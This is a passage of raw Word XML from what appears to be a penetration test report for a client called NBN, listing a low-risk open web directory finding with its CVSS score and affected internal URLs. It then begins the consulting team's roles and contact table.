        <w:t>Low</w:t>
      </w:r>
      <w:r w:rsidRPr="00542A1D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Risk Findings</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22A314DB" w14:textId="458BC472" w:rsidR="00542A1D" w:rsidRPr="001215EC" w:rsidRDefault="00542A1D" w:rsidP="00542A1D">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>Open Web Directory</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6563DA6A" w14:textId="77777777" w:rsidR="00542A1D" w:rsidRPr="006F5E52" w:rsidRDefault="00542A1D" w:rsidP="00542A1D">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542A1D" w:rsidRPr="005264D0" w14:paraId="37200093"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42BF11F0" w14:textId="10346568" w:rsidR="00542A1D" w:rsidRPr="005264D0" w:rsidRDefault="00542A1D" w:rsidP="006F27F5">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cs="Calibri"/>
              </w:rPr>
              <w:t>Open Web Directory</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00542A1D" w:rsidRPr="005264D0" w14:paraId="4E641DF5" w14:textId="77777777" w:rsidTr="00542A1D">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0070C0"/>
          </w:tcPr>
          <w:p w14:paraId="61C2DFD1" w14:textId="000EC765" w:rsidR="00542A1D" w:rsidRPr="00DA733E" w:rsidRDefault="00542A1D" w:rsidP="006F27F5">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF" w:themeColor="background1"/>
              </w:rPr>
              <w:t>Low</w:t>
            </w:r>
            <w:r w:rsidRPr="00DA733E">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF" w:themeColor="background1"/>
              </w:rPr>
              <w:t xml:space="preserve"> Risk</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2399" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="B9E1FF"/>
          </w:tcPr>
          <w:p w14:paraId="0C113BA8" w14:textId="77777777" w:rsidR="00542A1D" w:rsidRPr="005264D0" w:rsidRDefault="00542A1D" w:rsidP="006F27F5">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>CVSS Score</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5305" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="B9E1FF"/>
          </w:tcPr>
          <w:p w14:paraId="0C2A50A2" w14:textId="5BA5D2AC" w:rsidR="00542A1D" w:rsidRPr="005264D0" w:rsidRDefault="00542A1D" w:rsidP="006F27F5">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>3.7</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00542A1D" w:rsidRPr="005264D0" w14:paraId="7D47D3E5" w14:textId="77777777" w:rsidTr="00542A1D">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0070C0"/>
          </w:tcPr>
          <w:p w14:paraId="71DE284D" w14:textId="77777777" w:rsidR="00542A1D" w:rsidRPr="005264D0" w:rsidRDefault="00542A1D" w:rsidP="006F27F5">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2399" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="72BD0C2E" w14:textId="77777777" w:rsidR="00542A1D" w:rsidRPr="005264D0" w:rsidRDefault="00542A1D" w:rsidP="006F27F5">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>CVSS Vector String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5305" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="59892470" w14:textId="26AFDAFD" w:rsidR="00542A1D" w:rsidRPr="005264D0" w:rsidRDefault="00542A1D" w:rsidP="006F27F5">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00542A1D">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>CVSS:3.1/</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00542A1D">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>AV:N</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00542A1D">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="526FAD29" w14:textId="77777777" w:rsidR="00542A1D" w:rsidRDefault="00542A1D" w:rsidP="00542A1D">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Affected Locations</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2152D377" w14:textId="532E50F8" w:rsidR="00542A1D" w:rsidRDefault="00542A1D" w:rsidP="00542A1D">
      <w:pPr>
        <w:pStyle w:val="Code"/>
        <w:spacing w:after="0"/>
        <w:ind w:firstLine="720"/>
      </w:pPr>
      <w:r>
        <w:t>http://</w:t>
      </w:r>
      <w:r w:rsidRPr="003C17E2">
        <w:t>10.10.0.66</w:t>
      </w:r>
      <w:r>
        <w:t>/data/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D3A6CF5" w14:textId="4DAB0CC5" w:rsidR="00542A1D" w:rsidRDefault="00542A1D" w:rsidP="00542A1D">
      <w:pPr>
        <w:pStyle w:val="Code"/>
        <w:spacing w:after="0"/>
        <w:ind w:firstLine="720"/>
      </w:pPr>
      <w:r>
        <w:t>http://</w:t>
      </w:r>
      <w:r w:rsidRPr="003C17E2">
        <w:t>10.10.0.66</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:t>images</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B4AA877" w14:textId="2C88069C" w:rsidR="00542A1D" w:rsidRDefault="00542A1D" w:rsidP="00542A1D">
      <w:pPr>
        <w:pStyle w:val="Code"/>
        <w:spacing w:after="0"/>
        <w:ind w:firstLine="720"/>
      </w:pPr>
      <w:r>
        <w:t>http://</w:t>
      </w:r>
      <w:r w:rsidRPr="003C17E2">
        <w:t>10.10.0.66</w:t>
      </w:r>
      <w:r>
        <w:t>:8001</w:t>
      </w:r>
      <w:r>
        <w:t>/data/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CBC27B7" w14:textId="4522F4CA" w:rsidR="00542A1D" w:rsidRDefault="00542A1D" w:rsidP="00542A1D">
      <w:pPr>
        <w:pStyle w:val="Code"/>
        <w:spacing w:after="0"/>
        <w:ind w:firstLine="720"/>
      </w:pPr>
      <w:r>
        <w:t>http://</w:t>
      </w:r>
      <w:r w:rsidRPr="003C17E2">
        <w:t>10.10.0.66</w:t>
      </w:r>
      <w:r>
        <w:t>:8001</w:t>
      </w:r>
      <w:r>
        <w:t>/images/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="194C76B8" w14:textId="77777777" w:rsidR="00542A1D" w:rsidRPr="006F5E52" w:rsidRDefault="00542A1D" w:rsidP="00542A1D">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F5E52">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Details</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01F16CAB" w14:textId="152F3998" w:rsidR="00542A1D" w:rsidRDefault="00542A1D" w:rsidP="00542A1D">
      <w:r>
        <w:t>The assessment team discovered multiple open web directories throughout the NBN web application. Some of them contained sensitive information or names of restricted files. The /data/ directory shown below contains sensitive information that should not be accessed without authorization and shows the names of files that cannot be accessed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41A5CD75" w14:textId="6ED94F14" w:rsidR="00542A1D" w:rsidRPr="00542A1D" w:rsidRDefault="00542A1D" w:rsidP="00542A1D">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3D561A17" wp14:editId="779A46E9">
            <wp:extent cx="3048000" cy="3533775"/>
            <wp:effectExtent l="19050" t="19050" r="19050" b="28575"/>
            <wp:docPr id="536637113"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7113" name="Picture 11" descr="Table&#10;&#10;Description automatically generated with medium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r="20199" b="13922"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3048000" cy="353377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Pr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Open Web Directory</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="430E11EB" w14:textId="77777777" w:rsidR="00542A1D" w:rsidRDefault="00542A1D" w:rsidP="00542A1D">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B4E1881" w14:textId="77777777" w:rsidR="00542A1D" w:rsidRDefault="00542A1D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F9E0A5F" w14:textId="2DA05713" w:rsidR="00C32533" w:rsidRPr="005264D0" w:rsidRDefault="00000000" w:rsidP="00C32533">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005264D0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Roles and Responsibilities</w:t>
      </w:r>
      <w:bookmarkEnd w:id="14"/>
    </w:p>
    <w:p w14:paraId="3FF53AA7" w14:textId="03FCAE2C" w:rsidR="00C32533" w:rsidRPr="005264D0" w:rsidRDefault="00000000" w:rsidP="00C32533">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005264D0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>The Hyperthetical team consists of experienced penetration testers who will work closely with NBN's IT staff throughout the testing process. We will assign a project manager to oversee testing and ensure that clear lines of communication are maintained throughout the engagement.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42974504" w14:textId="6B238437" w:rsidR="00C32533" w:rsidRPr="005264D0" w:rsidRDefault="00000000" w:rsidP="00C32533">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="26" w:name="_Toc129370250"/>
      <w:r w:rsidRPr="005264D0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>Hyperthetical Consulting</w:t>
      </w:r>
      <w:bookmarkEnd w:id="26"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Style1"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2695"/>
        <w:gridCol w:w="6655"/>
      </w:tblGrid>
      <w:tr w:rsidR="00A23916" w:rsidRPr="005264D0" w14:paraId="360EAC87" w14:textId="77777777" w:rsidTr="005264D0">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1B9173A8" w14:textId="4A5B72CC" w:rsidR="00C32533" w:rsidRPr="005264D0" w:rsidRDefault="00000000" w:rsidP="00C32533">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005264D0">
              <w:rPr>
                <w:rFonts w:cs="Calibri"/>
              </w:rPr>
              <w:t>Hyperthetical Security Consulting (“Hyperthetical”)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A23916" w:rsidRPr="005264D0" w14:paraId="5C730EB9"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BFD8F3B" w14:textId="08423FD3" w:rsidR="00C32533" w:rsidRPr="005264D0" w:rsidRDefault="00000000" w:rsidP="00C32533">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005264D0">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>Business Address</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6655" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="796CC29E" w14:textId="2020BA22" w:rsidR="00C32533" w:rsidRPr="005264D0" w:rsidRDefault="00000000" w:rsidP="00C32533">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005264D0">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>6 MetroTech Center, Brooklyn, NY 11201</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A23916" w:rsidRPr="005264D0" w14:paraId="1E99B82F"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4508BBA1" w14:textId="02FBDC13" w:rsidR="00C32533" w:rsidRPr="005264D0" w:rsidRDefault="00000000" w:rsidP="00C32533">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005264D0">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>Website</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6655" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7B12E2F5" w14:textId="15E675E8" w:rsidR="00C32533" w:rsidRPr="005264D0" w:rsidRDefault="00000000" w:rsidP="00C32533">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005264D0">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>https://hyperthetical.com</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A23916" w:rsidRPr="005264D0" w14:paraId="26047FCE" w14:textId="77777777" w:rsidTr="00AE6477">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595959" w:themeFill="text1" w:themeFillTint="A6"/>
          </w:tcPr>
          <w:p w14:paraId="2BBDA8E1" w14:textId="7A3C00CB" w:rsidR="00C32533" w:rsidRPr="00AE6477" w:rsidRDefault="00000000" w:rsidP="00C32533">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00AE6477">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:color w:val="FFFFFF" w:themeColor="background1"/>
              </w:rPr>
              <w:t>Lead/Technical Consultant</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A23916" w:rsidRPr="005264D0" w14:paraId="42B015BD"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15A7C0EE" w14:textId="10167FEB" w:rsidR="00C32533" w:rsidRPr="005264D0" w:rsidRDefault="00000000" w:rsidP="00C32533">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005264D0">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>Assessor Name</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6655" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5FA11BB0" w14:textId="2809149C" w:rsidR="00C32533" w:rsidRPr="005264D0" w:rsidRDefault="00000000" w:rsidP="00C32533">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005264D0">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>Lindsay Von Tish</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A23916" w:rsidRPr="005264D0" w14:paraId="751012B6"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783ED597" w14:textId="6EA61BA5" w:rsidR="00C32533" w:rsidRPr="005264D0" w:rsidRDefault="00000000" w:rsidP="00C32533">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005264D0">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>Title</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6655" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1D94EB35" w14:textId="122BBDF8" w:rsidR="00C32533" w:rsidRPr="005264D0" w:rsidRDefault="00000000" w:rsidP="00C32533">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005264D0">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>CEO, Senior Security Consultant</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A23916" w:rsidRPr="005264D0" w14:paraId="0D2CCE8D"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04AAD4BF" w14:textId="41E11DB1" w:rsidR="00C32533" w:rsidRPr="005264D0" w:rsidRDefault="00000000" w:rsidP="00C32533">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005264D0">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>Email</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6655" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="28B043FB" w14:textId="2B5858E6" w:rsidR="00C32533" w:rsidRPr="005264D0" w:rsidRDefault="00000000" w:rsidP="00C32533">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005264D0">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>lmv9443@nyu.edu</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A23916" w:rsidRPr="005264D0" w14:paraId="470A2323"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0AFCACF3" w14:textId="532CA8FF" w:rsidR="00C32533" w:rsidRPr="005264D0" w:rsidRDefault="00000000" w:rsidP="00C32533">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005264D0">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>Telephone</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6655" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1A83A2D2" w14:textId="5BB4469F" w:rsidR="00C32533" w:rsidRPr="005264D0" w:rsidRDefault="00000000" w:rsidP="00C32533">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005264D0">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>(646) 997-3600</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A23916" w:rsidRPr="005264D0" w14:paraId="77F42681" w14:textId="77777777" w:rsidTr="00AE6477">
        <w:trPr>
          <w:cnfStyle w:val="000000010000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="1" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9350" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:shd w:val="clear" w:color="auto" w:fill="595959" w:themeFill="text1" w:themeFillTint="A6"/>
          </w:tcPr>
          <w:p w14:paraId="48A1883B" w14:textId="1264FD8F" w:rsidR="00C32533" w:rsidRPr="005264D0" w:rsidRDefault="00000000" w:rsidP="00C32533">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00AE6477">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:color w:val="FFFFFF" w:themeColor="background1"/>
              </w:rPr>
              <w:t>Engagement Manager</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A23916" w:rsidRPr="005264D0" w14:paraId="0FB89A92"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64634EB" w14:textId="44A9E2C0" w:rsidR="00E34796" w:rsidRPr="005264D0" w:rsidRDefault="00000000" w:rsidP="00E34796">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005264D0">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>Name</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6655" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2E6910DC" w14:textId="0BE73F18" w:rsidR="00E34796" w:rsidRPr="005264D0" w:rsidRDefault="00000000" w:rsidP="00E34796">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005264D0">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>Lindsay Von Tish</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A23916" w:rsidRPr="005264D0" w14:paraId="4720729F"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6C76193F" w14:textId="2BE94AEB" w:rsidR="00E34796" w:rsidRPr="005264D0" w:rsidRDefault="00000000" w:rsidP="00E34796">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005264D0">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>Title</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6655" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="09B385CB" w14:textId="416C423A" w:rsidR="00E34796" w:rsidRPr="005264D0" w:rsidRDefault="00000000" w:rsidP="00E34796">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005264D0">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>CEO, Senior Security Consultant</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A23916" w:rsidRPr="005264D0" w14:paraId="2600FB34"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42DA083E" w14:textId="2FEBE846" w:rsidR="00E34796" w:rsidRPr="005264D0" w:rsidRDefault="00000000" w:rsidP="00E34796">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005264D0">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>Email</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6655" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="417AFB21" w14:textId="713581FC" w:rsidR="00E34796" w:rsidRPr="005264D0" w:rsidRDefault="00000000" w:rsidP="00E34796">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005264D0">
              <w:rPr>
